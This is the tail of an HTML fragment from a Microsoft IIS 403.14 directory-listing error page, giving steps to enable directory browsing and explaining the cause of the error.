<li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=403,14,0x00000000,6002">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>